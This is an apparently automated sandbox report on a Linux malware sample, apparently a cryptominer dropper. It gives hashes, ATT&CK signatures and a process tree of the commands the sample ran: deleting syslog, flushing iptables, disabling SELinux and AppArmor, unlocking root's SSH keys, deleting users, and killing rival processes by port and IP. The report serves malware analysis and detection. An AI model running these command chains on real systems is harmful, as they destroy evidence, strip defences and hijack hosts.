7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5

Analysis

max time kernel
92s
max time network
124s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
29-09-2024 11:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Size

27KB
MD5

fe70c19936ef32efb00f3c75ea90e701
SHA1

461514742ae77741e53efb6975ffd8d3db264c92
SHA256

7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
SHA512

dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
SSDEEP

384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

pid process

2149
2155
Executes dropped EXE 1 IoCs

Processes:

ioc pid process

/usr/bin/salt-store 2160
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
defense_evasion

Disable or Modify System Firewall
T1562.004

Processes:

iptables

pid process

726 iptables
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

731 sudo

pid	process
2149
2155

ioc	pid	process
/usr/bin/salt-store	2160

pid	process
726	iptables

pid	process
731	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	process
1390	xargs
1637	xargs
1705	xargs
1747	xargs
811	xargs
1213	xargs
1253	xargs
2106
781	xargs
853	xargs
936	xargs
1608	xargs
1623	xargs
2066
904	xargs
1507	xargs
1725	xargs
1743	xargs
1787	xargs
889	xargs
1093	xargs
1103	xargs
1454	xargs
1472	xargs
1723	xargs
1791	xargs
2030
2090
2082
1415	xargs
1489	xargs
2034
1420	xargs
1537	xargs
775	xargs
823	xargs
1158	xargs
753	chattr
1357	xargs
1375	xargs
950	xargs
1031	xargs
1478	xargs
1775	xargs
1779	xargs
1053	xargs
1266	xargs
1543	xargs
957	xargs
1715	xargs
1583	xargs
1153	xargs
1344	xargs
1525	xargs
1442	xargs
2094
1655	xargs
977	xargs
990	xargs
1598	xargs
1351	xargs
1385	xargs
1667	xargs
805	xargs

Creates/modifies Cron job 1 TTPs 22 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.GGEEeE
File opened for modification	/var/spool/cron/crontabs/tmp.LdR515
File opened for modification	/var/spool/cron/crontabs/tmp.xvCjV8
File opened for modification	/var/spool/cron/crontabs/tmp.WTtnGV
File opened for modification	/var/spool/cron/crontabs/tmp.mvue5i
File opened for modification	/var/spool/cron/crontabs/tmp.TXah3K
File opened for modification	/var/spool/cron/crontabs/tmp.QmXmZV
File opened for modification	/var/spool/cron/crontabs/tmp.WPicki
File opened for modification	/var/spool/cron/crontabs/tmp.8crptv
File opened for modification	/var/spool/cron/crontabs/tmp.hcVNxJ
File opened for modification	/var/spool/cron/crontabs/tmp.3q2bes
File opened for modification	/var/spool/cron/crontabs/tmp.sSDeaX
File opened for modification	/var/spool/cron/crontabs/tmp.ALpD7d
File opened for modification	/var/spool/cron/crontabs/tmp.12y2cr
File opened for modification	/var/spool/cron/crontabs/tmp.yW7hpB
File opened for modification	/var/spool/cron/crontabs/tmp.Kl4d2H
File opened for modification	/var/spool/cron/crontabs/tmp.pVrl08
File opened for modification	/var/spool/cron/crontabs/tmp.emZbnh
File opened for modification	/var/spool/cron/crontabs/tmp.JJEVBJ
File opened for modification	/var/spool/cron/crontabs/tmp.oitc0e
File opened for modification	/var/spool/cron/crontabs/tmp.SAgx3g
File opened for modification	/var/spool/cron/crontabs/tmp.vhpOfs

Disables AppArmor 16 IoCs
Disables AppArmor security module.

Processes:

pid process

2116
2116
2123
2124
2116
2127
2129
2124
2124
2131
2116
2116
2116
2124
2124
2124
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
defense_evasion

Disable or Modify Tools
T1562.001

Processes:

pid process

2115
Enumerates running processes
Discovers information about currently running processes on the system
Write file to user bin folder 2 IoCs
persistence

Processes:

description ioc process

File opened for modification /usr/bin/salt-store
File opened for modification /usr/bin/salt-store

pid	process
2116
2116
2123
2124
2116
2127
2129
2124
2124
2131
2116
2116
2116
2124
2124
2124

pid	process
2115

description	ioc	process
File opened for modification	/usr/bin/salt-store
File opened for modification	/usr/bin/salt-store

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspgreppkillpspspspkillpkillpspgreppgreppkillpkillpgreppkillpkillpspspkillpspspspkillpspspgreppgreppspspspgreppkillpspgreppkillpgreppgreppspspspkillpspkillpkillpspgreppkillpkillpspspspspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

description	ioc	process
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	process
946	ps
1083	ps
1353	ps
1508	ps
912	ps
1164	ps
1256	ps
1443	ps
1532	ps
1139	ps
1099	ps
1364	ps
1449	ps
1042	ps
1221	ps
1406	ps
1421	ps
1089	ps
1072	ps
1109	ps
1313	ps
895	ps
1154	ps
1396	ps
1401	ps
1455	ps
1544	ps
1094	ps
1159	ps
1301	ps
1437	ps
1056	ps
1063	ps
1119	ps
1178	ps
1320	ps
1473	ps
998	ps
1114	ps
1358	ps
1034	ps
1327	ps
1554	ps
1188	ps
973	ps
1005	ps
1426	ps
1502	ps
1538	ps
1549	ps
926	ps
1243	ps
1346	ps
1484	ps
1230	ps
1339	ps
1467	ps
1569	ps
1237	ps
1173	ps
1391	ps
1514	ps
1526	ps
1078	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspkillpkillxargspspgreppspspspspspspspspspspgreppspspspspgreppgreppspspspspspspgreppgreppspkillpspspkillpspspspgreppgreppspspspspspkillpgreppspspkill

description	ioc	process
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/713/stat	ps
File opened for reading	/proc/1800/status	pkill
File opened for reading	/proc/717/status	pkill
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/69/cmdline	ps
File opened for reading	/proc/12/status	pgrep
File opened for reading	/proc/384/cmdline	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/721/stat	ps
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/126/cmdline	ps
File opened for reading	/proc/72/stat	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/1376/cmdline	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/74/cmdline	pgrep
File opened for reading	/proc/19/status	ps
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/721/status	ps
File opened for reading	/proc/389/status	pgrep
File opened for reading	/proc/17/cmdline	pgrep
File opened for reading	/proc/126/cmdline	ps
File opened for reading	/proc/1091/stat	ps
File opened for reading	/proc/74/status	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/674/cmdline	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/70/cmdline	pgrep
File opened for reading	/proc/71/cmdline	ps
File opened for reading	/proc/2140/status
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/110/cmdline	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/1411/cmdline	ps
File opened for reading	/proc/680/stat	ps
File opened for reading	/proc/21/cmdline	pgrep
File opened for reading	/proc/715/cmdline	pgrep
File opened for reading	/proc/6/status
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/82/stat	ps
File opened for reading	/proc/721/status	ps
File opened for reading	/proc/73/stat	ps
File opened for reading	/proc/227/cmdline	ps
File opened for reading	/proc/439/cmdline	ps
File opened for reading	/proc/126/stat	ps
File opened for reading	/proc/127/status	ps
File opened for reading	/proc/713/stat	ps
File opened for reading	/proc/17/status	pkill
File opened for reading	/proc/15/status
File opened for reading	/proc/126/status	pgrep
File opened for reading	/proc/37/cmdline	ps
File opened for reading	/proc/439/cmdline	ps
File opened for reading	/proc/77/status	pkill

System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

grepgrepgrep

pid process

1131 grep
1161 grep
1403 grep
1933
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

description ioc process

File opened for modification /tmp/log_rot fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

pid	process
1131	grep
1161	grep
1403	grep
1933

description	ioc	process
File opened for modification	/tmp/log_rot	fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:717

/bin/rm
rm -rf /var/log/syslog
2⤵
PID:718

/usr/bin/chattr
chattr -iua /tmp/
2⤵
PID:720

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:724

/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:726

/usr/bin/sudo
sudo sysctl "kernel.nmi_watchdog=0"
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:731

/usr/sbin/sendmail
sendmail -t
3⤵
PID:741

/usr/sbin/exim4
/usr/sbin/exim4 -Mc 1suqJW-0000Bx-7D
4⤵
PID:757

/usr/sbin/sendmail
sendmail -t
3⤵
PID:745

/usr/sbin/exim4
/usr/sbin/exim4 -Mc 1suqJW-0000C1-5z
4⤵
PID:756

/sbin/sysctl
sysctl "kernel.nmi_watchdog=0"
3⤵
PID:747

/usr/sbin/userdel
userdel akay
2⤵
PID:750

/usr/sbin/userdel
userdel vfinder
2⤵
PID:751

/usr/bin/chattr
chattr -iae /root/.ssh/
2⤵
- Attempts to change immutable files
PID:753

/usr/bin/chattr
chattr -iae /root/.ssh/authorized_keys
2⤵
PID:755

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:758

/bin/rm
rm -rf "/tmp/walle*"
2⤵
PID:760

/bin/rm
rm -rf /tmp/keys
2⤵
PID:761

/bin/grep
grep -i "[a]liyun"
2⤵
PID:764

/bin/ps
ps aux
2⤵
PID:763

/bin/grep
grep -i "[y]unjing"
2⤵
PID:770

/bin/ps
ps aux
2⤵
PID:769

/bin/grep
grep 185.71.65.238
2⤵
PID:772

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:773

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:774

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:775

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:781

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:779

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:780

/bin/grep
grep 140.82.52.87
2⤵
PID:778

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:787

/bin/grep
grep :443
2⤵
PID:783

/bin/grep
grep -v -
2⤵
PID:786

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:785

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:784

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:793

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:791

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:790

/bin/grep
grep -v -
2⤵
PID:792

/bin/grep
grep :23
2⤵
PID:789

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:799

/bin/grep
grep -v -
2⤵
PID:798

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:797

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:796

/bin/grep
grep :443
2⤵
PID:795

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:805

/bin/grep
grep -v -
2⤵
PID:804

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:803

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:802

/bin/grep
grep :143
2⤵
PID:801

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:811

/bin/grep
grep -v -
2⤵
PID:810

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:809

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:808

/bin/grep
grep :2222
2⤵
PID:807

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:817

/bin/grep
grep -v -
2⤵
PID:816

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:815

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:814

/bin/grep
grep :3333
2⤵
PID:813

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:823

/bin/grep
grep -v -
2⤵
PID:822

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:821

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:820

/bin/grep
grep :3389
2⤵
PID:819

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:829

/bin/grep
grep -v -
2⤵
PID:828

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:827

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:826

/bin/grep
grep :4444
2⤵
PID:825

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:835

/bin/grep
grep -v -
2⤵
PID:834

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:833

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:832

/bin/grep
grep :5555
2⤵
PID:831

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:841

/bin/grep
grep -v -
2⤵
PID:840

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:839

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:838

/bin/grep
grep :6666
2⤵
PID:837

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:847

/bin/grep
grep -v -
2⤵
PID:846

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:845

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:844

/bin/grep
grep :6665
2⤵
PID:843

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:853

/bin/grep
grep -v -
2⤵
PID:852

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:851

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:850

/bin/grep
grep :6667
2⤵
PID:849

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:859

/bin/grep
grep -v -
2⤵
PID:858

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:857

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:856

/bin/grep
grep :7777
2⤵
PID:855

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:865

/bin/grep
grep -v -
2⤵
PID:864

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:863

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:862

/bin/grep
grep :8444
2⤵
PID:861

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:871

/bin/grep
grep -v -
2⤵
PID:870

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:869

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:868

/bin/grep
grep :3347
2⤵
PID:867

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:877

/bin/grep
grep -v -
2⤵
PID:876

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:875

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:874

/bin/grep
grep :14444
2⤵
PID:873

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:883

/bin/grep
grep -v -
2⤵
PID:882

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:881

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:880

/bin/grep
grep :14433
2⤵
PID:879

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:889

/bin/grep
grep -v -
2⤵
PID:888

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:887

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:886

/bin/grep
grep :13531
2⤵
PID:885

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:894

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:893

/bin/grep
grep -v grep
2⤵
PID:892

/bin/grep
grep "sleep 60"
2⤵
PID:891

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:890

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:898

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:899

/bin/grep
grep -v grep
2⤵
PID:897

/bin/grep
grep ./crun
2⤵
PID:896

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:895

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:904

/usr/bin/awk
awk "{if(\$3>80.0) print \$2}"
2⤵
PID:903

/bin/grep
grep -v grep
2⤵
PID:902

/bin/grep
grep -vw salt-minions
2⤵
PID:901

/bin/ps
ps aux
2⤵
PID:900

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:909

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:908

/bin/grep
grep :3333
2⤵
PID:907

/bin/grep
grep -v grep
2⤵
PID:906

/bin/ps
ps aux
2⤵
PID:905

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:916

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:915

/bin/grep
grep :5555
2⤵
PID:914

/bin/grep
grep -v grep
2⤵
PID:913

/bin/ps
ps aux
2⤵
- Process Discovery
PID:912

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:923

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:922

/bin/grep
grep "kworker -c\\"
2⤵
PID:921

/bin/grep
grep -v grep
2⤵
PID:920

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:919

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:930

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:929

/bin/grep
grep log_
2⤵
PID:928

/bin/grep
grep -v grep
2⤵
PID:927

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:926

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:936

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:935

/bin/grep
grep systemten
2⤵
PID:934

/bin/grep
grep -v grep
2⤵
PID:933

/bin/ps
ps aux
2⤵
PID:932

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:942

/usr/local/sbin/kill
kill -9 10
3⤵
PID:945

/usr/local/bin/kill
kill -9 10
3⤵
PID:945

/usr/sbin/kill
kill -9 10
3⤵
PID:945

/usr/bin/kill
kill -9 10
3⤵
PID:945

/sbin/kill
kill -9 10
3⤵
PID:945

/bin/kill
kill -9 10
3⤵
PID:945

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:941

/bin/grep
grep netns
2⤵
PID:940

/bin/grep
grep -v grep
2⤵
PID:939

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:938

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:950

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:949

/bin/grep
grep voltuned
2⤵
PID:948

/bin/grep
grep -v grep
2⤵
PID:947

/bin/ps
ps aux
2⤵
- Process Discovery
PID:946

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:957

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:956

/bin/grep
grep darwin
2⤵
PID:955

/bin/grep
grep -v grep
2⤵
PID:954

/bin/ps
ps aux
2⤵
PID:953

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:964

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:963

/bin/grep
grep /tmp/dl
2⤵
PID:962

/bin/grep
grep -v grep
2⤵
PID:961

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:960

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:971

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:970

/bin/grep
grep /tmp/ddg
2⤵
PID:969

/bin/grep
grep -v grep
2⤵
PID:968

/bin/ps
ps aux
2⤵
PID:967

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:977

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:976

/bin/grep
grep /tmp/pprt
2⤵
PID:975

/bin/grep
grep -v grep
2⤵
PID:974

/bin/ps
ps aux
2⤵
- Process Discovery
PID:973

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:984

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:983

/bin/grep
grep /tmp/ppol
2⤵
PID:982

/bin/grep
grep -v grep
2⤵
PID:981

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:980

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:990

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:989

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:988

/bin/grep
grep -v grep
2⤵
PID:987

/bin/ps
ps aux
2⤵
PID:986

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:997

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:996

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:995

/bin/grep
grep -v grep
2⤵
PID:994

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:993

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1002

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1001

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:1000

/bin/grep
grep -v grep
2⤵
PID:999

/bin/ps
ps aux
2⤵
- Process Discovery
PID:998

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1009

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1008

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:1007

/bin/grep
grep -v grep
2⤵
PID:1006

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1005

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1016

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1015

/bin/grep
grep 45.76.122.92
2⤵
PID:1014

/bin/grep
grep -v grep
2⤵
PID:1013

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1012

/bin/ps
ps aux
2⤵
PID:1019

/bin/grep
grep 51.38.191.178
2⤵
PID:1021

/bin/grep
grep -v grep
2⤵
PID:1020

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1022

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1023

/bin/grep
grep 51.15.56.161
2⤵
PID:1029

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1031

/bin/grep
grep -v grep
2⤵
PID:1028

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1030

/bin/ps
ps aux
2⤵
PID:1027

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1038

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1037

/bin/grep
grep 86s.jpg
2⤵
PID:1036

/bin/grep
grep -v grep
2⤵
PID:1035

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1034

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1046

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1045

/bin/grep
grep aGTSGJJp
2⤵
PID:1044

/bin/grep
grep -v grep
2⤵
PID:1043

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1042

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1053

